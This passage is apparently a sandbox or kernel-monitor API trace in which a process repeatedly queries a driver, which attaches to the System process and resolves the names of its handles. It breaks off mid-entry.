[0288.649] ObQueryNameString (in: Object=0xffffe00069320910, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.649] ObfDereferenceObject (Object=0xffffe00069320910) returned 0x7fff [0288.649] IoCompleteRequest () returned 0x0 [0288.649] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0288.649] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.649] PsAcquireProcessExitSynchronization () returned 0x0 [0288.649] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.649] ObReferenceObjectByHandle (in: Handle=0xffffffff800009f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006931f2d0, HandleInformation=0x0) returned 0x0 [0288.649] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.649] PsReleaseProcessExitSynchronization () returned 0x2 [0288.649] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f86a [0288.649] ObQueryNameString (in: Object=0xffffe0006931f2d0, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.649] ObfDereferenceObject (Object=0xffffe0006931f2d0) returned 0x7fff [0288.649] IoCompleteRequest () returned 0x0 [0288.649] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0288.649] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.649] PsAcquireProcessExitSynchronization () returned 0x0 [0288.649] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.649] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a00, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069321a90, HandleInformation=0x0) returned 0x0 [0288.649] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.649] PsReleaseProcessExitSynchronization () returned 0x2 [0288.649] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f869 [0288.649] ObQueryNameString (in: Object=0xffffe00069321a90, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.649] ObfDereferenceObject (Object=0xffffe00069321a90) returned 0x7b67 [0288.649] IoCompleteRequest () returned 0x0 [0288.649] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0288.649] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.649] PsAcquireProcessExitSynchronization () returned 0x0 [0288.649] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.649] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a20, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a328bb0, HandleInformation=0x0) returned 0x0 [0288.649] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.650] PsReleaseProcessExitSynchronization () returned 0x2 [0288.650] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f868 [0288.650] ObQueryNameString (in: Object=0xffffe0006a328bb0, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.650] ObfDereferenceObject (Object=0xffffe0006a328bb0) returned 0x7fff [0288.650] IoCompleteRequest () returned 0x0 [0288.650] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.650] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.650] PsAcquireProcessExitSynchronization () returned 0x0 [0288.650] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.650] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006936d1b0, HandleInformation=0x0) returned 0x0 [0288.650] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.650] PsReleaseProcessExitSynchronization () returned 0x2 [0288.650] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f867 [0288.650] ObQueryNameString (in: Object=0xffffe0006936d1b0, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.650] ObfDereferenceObject (Object=0xffffe0006936d1b0) returned 0x7ffe [0288.650] IoCompleteRequest () returned 0x0 [0288.650] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.650] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.650] PsAcquireProcessExitSynchronization () returned 0x0 [0288.650] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.650] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a34, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006927df20, HandleInformation=0x0) returned 0x0 [0288.650] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.650] PsReleaseProcessExitSynchronization () returned 0x2 [0288.650] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f866 [0288.650] ObQueryNameString (in: Object=0xffffe0006927df20, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.650] ObfDereferenceObject (Object=0xffffe0006927df20) returned 0x7f01 [0288.650] IoCompleteRequest () returned 0x0 [0288.650] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0288.650] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.650] PsAcquireProcessExitSynchronization () returned 0x0 [0288.650] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.650] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a3e3f20, HandleInformation=0x0) returned 0x0 [0288.650] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.650] PsReleaseProcessExitSynchronization () returned 0x2 [0288.650] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f865 [0288.650] ObQueryNameString (in: Object=0xffffe0006a3e3f20, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.650] ObfDereferenceObject (Object=0xffffe0006a3e3f20) returned 0x7fff [0288.650] IoCompleteRequest () returned 0x0 [0288.650] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0288.650] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.650] PsAcquireProcessExitSynchronization () returned 0x0 [0288.650] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.651] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a44, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00079221490, HandleInformation=0x0) returned 0x0 [0288.651] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.651] PsReleaseProcessExitSynchronization () returned 0x2 [0288.651] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f864 [0288.651] ObQueryNameString (in: Object=0xffffe00079221490, ObjectNameInfo=0xffffe0006a2ca044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2ca044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.651] ObfDereferenceObject (Object=0xffffe00079221490) returned 0x7ffe [0288.651] IoCompleteRequest () returned 0x0 [0288.651] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0288.651] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.651] PsAcquireProcessExitSynchronization () returned 0x0 [0288.651] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.651] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a4c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007cdf3a40, HandleInformation=0x0) returned 0x0 [0288.651] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.651] PsReleaseProcessExitSynchronization () returned 0x2 [0288.651] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f863 [0288.651] ObQueryNameString (in: Object=0xffffe0007cdf3a40, ObjectNameInfo=0xffffe0006a3e57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3e57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.651] ObfDereferenceObject (Object=0xffffe0007cdf3a40) returned 0x7fff [0288.651] IoCompleteRequest () returned 0x0 [0288.651] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x50, lpOverlapped=0x0) returned 1 [0288.651] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.651] PsAcquireProcessExitSynchronization () returned 0x0 [0288.651] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.651] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a7469e0, HandleInformation=0x0) returned 0x0 [0288.651] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.651] PsReleaseProcessExitSynchronization () returned 0x2 [0288.651] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f862 [0288.651] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000692bf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe000692bf7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.651] ObfDereferenceObject (Object=0xffffe0006a7469e0) returned 0x7ffd [0288.651] IoCompleteRequest () returned 0x0 [0288.651] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x5e, lpOverlapped=0x0) returned 1 [0288.651] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.651] PsAcquireProcessExitSynchronization () returned 0x0 [0288.651] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.651] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a84, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a7459e0, HandleInformation=0x0) returned 0x0 [0288.651] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.651] PsReleaseProcessExitSynchronization () returned 0x2 [0288.651] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f861 [0288.651] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a610704, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a610704, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.651] ObfDereferenceObject (Object=0xffffe0006a7459e0) returned 0x7ff4 [0288.651] IoCompleteRequest () returned 0x0 [0288.651] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x68, lpOverlapped=0x0) returned 1 [0288.652] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.652] PsAcquireProcessExitSynchronization () returned 0x0 [0288.652] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.652] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a8c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a816ac0, HandleInformation=0x0) returned 0x0 [0288.652] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.652] PsReleaseProcessExitSynchronization () returned 0x2 [0288.652] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f860 [0288.652] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5bc7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5bc7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.652] ObfDereferenceObject (Object=0xffffe0006a816ac0) returned 0x7ffc [0288.652] IoCompleteRequest () returned 0x0 [0288.652] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x64, lpOverlapped=0x0) returned 1 [0288.652] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.652] PsAcquireProcessExitSynchronization () returned 0x0 [0288.652] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.652] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a94, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4a5f20, HandleInformation=0x0) returned 0x0 [0288.652] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.652] PsReleaseProcessExitSynchronization () returned 0x2 [0288.934] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f85f [0288.934] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006913a404, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006913a404, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.934] ObfDereferenceObject (Object=0xffffe0006a4a5f20) returned 0x800e [0288.934] IoCompleteRequest () returned 0x0 [0288.934] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x3c, lpOverlapped=0x0) returned 1 [0288.934] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.934] PsAcquireProcessExitSynchronization () returned 0x0 [0288.934] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.934] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a9c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4a5a20, HandleInformation=0x0) returned 0x0 [0288.934] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.934] PsReleaseProcessExitSynchronization () returned 0x2 [0288.934] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f85e [0288.934] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000692bf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe000692bf7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.934] ObfDereferenceObject (Object=0xffffe0006a4a5a20) returned 0x7ffe [0288.934] IoCompleteRequest () returned 0x0 [0288.934] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x72, lpOverlapped=0x0) returned 1 [0288.934] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.934] PsAcquireProcessExitSynchronization () returned 0x0 [0288.934] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.934] ObReferenceObjectByHandle (in: Handle=0xffffffff80000aa4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a747a80, HandleInformation=0x0) returned 0x0 [0288.934] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.934] PsReleaseProcessExitSynchronization () returned 0x2 [0288.934] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f85d [0288.934] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a610704, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a610704, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.935] ObfDereferenceObject (Object=0xffffe0006a747a80) returned 0x7e29 [0288.935] IoCompleteRequest () returned 0x0 [0288.935] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0288.935] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.935] PsAcquireProcessExitSynchronization () returned 0x0 [0288.935] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.935] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ac0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006903a370, HandleInformation=0x0) returned 0x0 [0288.935] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.935] PsReleaseProcessExitSynchronization () returned 0x2 [0288.935] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f85c [0288.935] ObQueryNameString (in: Object=0xffffe0006903a370, ObjectNameInfo=0xffffe0006a5bc7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5bc7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.935] ObfDereferenceObject (Object=0xffffe0006903a370) returned 0x7fff [0288.935] IoCompleteRequest () returned 0x0 [0288.935] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0288.935] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.935] PsAcquireProcessExitSynchronization () returned 0x0 [0288.935] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.935] ObReferenceObjectByHandle (in: Handle=0xffffffff80000acc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f45b10, HandleInformation=0x0) returned 0x0 [0288.935] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.935] PsReleaseProcessExitSynchronization () returned 0x2 [0288.935] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f85b [0288.935] ObQueryNameString (in: Object=0xffffe00069f45b10, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.935] ObfDereferenceObject (Object=0xffffe00069f45b10) returned 0x7fff [0288.935] IoCompleteRequest () returned 0x0 [0288.935] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x1e6, lpOverlapped=0x0) returned 1 [0288.935] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.935] PsAcquireProcessExitSynchronization () returned 0x0 [0288.935] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.935] ObReferenceObjectByHandle (in: Handle=0xffffffff80000b08, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a03ccf0, HandleInformation=0x0) returned 0x0 [0288.935] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.935] PsReleaseProcessExitSynchronization () returned 0x2 [0288.935] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f85a [0288.935] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3e57c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a3e57c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.935] ObfDereferenceObject (Object=0xffffe0006a03ccf0) returned 0x7f3d [0288.935] IoCompleteRequest () returned 0x0 [0288.935] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x2c, lpOverlapped=0x0) returned 1 [0288.935] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.935] PsAcquireProcessExitSynchronization () returned 0x0 [0288.935] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: 